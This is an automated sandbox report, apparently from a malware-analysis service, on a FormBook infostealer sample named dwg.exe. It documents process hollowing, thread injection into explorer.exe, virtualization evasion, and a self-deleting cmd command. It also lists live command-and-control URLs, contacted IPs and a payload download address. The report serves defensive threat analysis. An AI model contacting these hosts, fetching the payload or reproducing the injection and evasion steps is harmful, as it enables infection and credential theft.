      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045090AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045541E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044FA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044EC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045451BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044F61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_045469A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04554257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044C9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0450927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0457B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_04598A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044D8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_0458AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044E3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 10_2_044CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.179 80
      Source: C:\Windows\explorer.exeNetwork Connect: 23.110.124.43 80
      Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
      Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.25 80
      Source: C:\Windows\explorer.exeNetwork Connect: 104.18.194.20 80
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 23.111.137.154 80
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread register set: target process: 3388
      Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\dwg.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\dwg.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 130000
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: explorer.exe, 00000005.00000002.461660778.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000005.00000000.271741087.0000000006860000.00000004.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000005.00000000.256795831.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 0000000A.00000002.461890375.0000000002CA0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E120E cpuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 6696, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: cmmon32.exe PID: 2208, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000004.00000002.291759356.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.296448526.000000001DEB0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.460585611.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.461025057.0000000002360000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery721Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery311SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 357209 Sample: dwg.exe Startdate: 24/02/2021 Architecture: WINDOWS Score: 100 29 www.resp04.online 2->29 31 www.process-activation.net 2->31 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 5 other signatures 2->47 11 dwg.exe 1 2->11         started        signatures3 process4 signatures5 57 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->57 59 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 11->59 61 Tries to detect Any.run 11->61 63 3 other signatures 11->63 14 dwg.exe 6 11->14         started        process6 dnsIp7 39 45.153.203.193, 49719, 80 NETLABFR Netherlands 14->39 65 Modifies the context of a thread in another process (thread injection) 14->65 67 Tries to detect Any.run 14->67 69 Maps a DLL or memory area into another process 14->69 71 3 other signatures 14->71 18 explorer.exe 14->18 injected signatures8 process9 dnsIp10 33 www.india-vspakistanlive.com 23.110.124.43, 49742, 80 LEASEWEB-USA-LAX-11US United States 18->33 35 neuroacademyok.com 23.111.137.154, 49741, 80 HVC-ASUS United States 18->35 37 13 other IPs or domains 18->37 49 System process connects to network (likely due to code injection or exploit) 18->49 22 cmmon32.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      dwg.exe17%ReversingLabsWin32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      10.2.cmmon32.exe.49d7960.5.unpack100%AviraTR/Dropper.GenDownload File
      10.2.cmmon32.exe.26e45d0.2.unpack100%AviraTR/Dropper.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxR0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
      http://www.winningscotland.com/gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSb0%Avira URL Cloudsafe
      http://www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJ0%Avira URL Cloudsafe
      http://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSb0%Avira URL Cloudsafe
      http://www.hhappxz.com/0%Avira URL Cloudsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.tiro.com0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://www.goodfont.co.kr0%URL Reputationsafe
      http://45.153.203.193/nn.bin0%Avira URL Cloudsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.carterandcone.coml0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.typography.netD0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://fontfabrik.com0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.founder.com.cn/cn0%URL Reputationsafe
      http://www.india-vspakistanlive.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxb0%Avira URL Cloudsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
      http://www.neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSb0%Avira URL Cloudsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.sandoll.co.kr0%URL Reputationsafe
      http://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV0%Avira URL Cloudsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.sakkal.com0%URL Reputationsafe
      http://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU10%Avira URL Cloudsafe
      http://hhspapp8.com/dh5/index.html0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      neuroacademyok.com
      		23.111.137.154
      		truetrue
        		unknown
        www.process-activation.net
        		109.68.33.25
        		truefalse
          		unknown
          www.rentcafecloudflaremvccn.com
          		104.18.194.20
          		truetrue
            		unknown
            HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
            		3.223.115.185
            		truefalse
              		high
              bloomingintoyou.com
              		192.0.78.25
              		truetrue
                		unknown
                ghs.googlehosted.com
                		142.250.185.179
                		truetrue
                  		unknown
                  kreatelymedia.com
                  		34.102.136.180
                  		truetrue
                    		unknown
                    www.india-vspakistanlive.com
                    		23.110.124.43
                    		truetrue
                      		unknown
                      www.hamiltonparkpdx.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.winningscotland.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ibluebay3dwd.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.bloomingintoyou.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.resp04.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.kreatelymedia.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.neuroacademyok.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.readingqueens.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.winningscotland.com/gzjz/?an=H++1jH4LKbR0fJKel0r+X/Bgsf9YQS9YCvMETuo+3edei6txUlQLYKB4EjEP5vt6Q2ea&Rxo=8pyT5Z4hoPNLSbtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.kreatelymedia.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=LENh5Imcw7WV23PMDSK6gQgZ7usNfvsiux/HEpxATH+NcHhzFLQFIzxEn7XOqifbExQJtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.readingqueens.com/gzjz/?an=FjP/8nTVipDtB7rMeh6473uM1PeF+4kTlJ1YfKzI0TvNj01mXujzKbdkPkRKtuLnfvUf&Rxo=8pyT5Z4hoPNLSbtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://45.153.203.193/nn.bintrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.india-vspakistanlive.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=jd3N18O1dmETY8AwSK2SCf/DBHf2WfDwkoednOutgI3n+6kC8/qkQJNPdpn7LPtDVMxbtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.neuroacademyok.com/gzjz/?an=/pUzTSccEH+RkAwwv+GOC/YRN8fCteWKlCqISlYUoueysdRKiHy5pXXTDI02yup/WIos&Rxo=8pyT5Z4hoPNLSbtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeVtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hamiltonparkpdx.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=g/ID2zcVRpzk9dEh2O/HeBX/PmjvP3gMDSJL8xLFEItD5siNJ7dqXm1dyHJfWJK4oFU1true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            https://www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRcmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.hhappxz.com/cmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://zz.bdstatic.com/linksubmit/push.jscmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.tiro.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://push.zhanzhang.baidu.com/push.jscmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.typography.netDexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://fontfabrik.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fonts.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.sakkal.comexplorer.exe, 00000005.00000000.275736987.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://hhspapp8.com/dh5/index.htmlcmmon32.exe, 0000000A.00000002.463980109.0000000004B52000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              192.0.78.25
                                                              		unknownUnited States
                                                              		2635AUTOMATTICUStrue
                                                              104.18.194.20
                                                              		unknownUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              45.153.203.193
                                                              		unknownNetherlands
                                                              		35251NETLABFRtrue
                                                              142.250.185.179
                                                              		unknownUnited States
                                                              		15169GOOGLEUStrue
                                                              34.102.136.180
                                                              		unknownUnited States
                                                              		15169GOOGLEUStrue
                                                              23.111.137.154
                                                              		unknownUnited States
                                                              		29802HVC-ASUStrue
                                                              23.110.124.43
                                                              		unknownUnited States
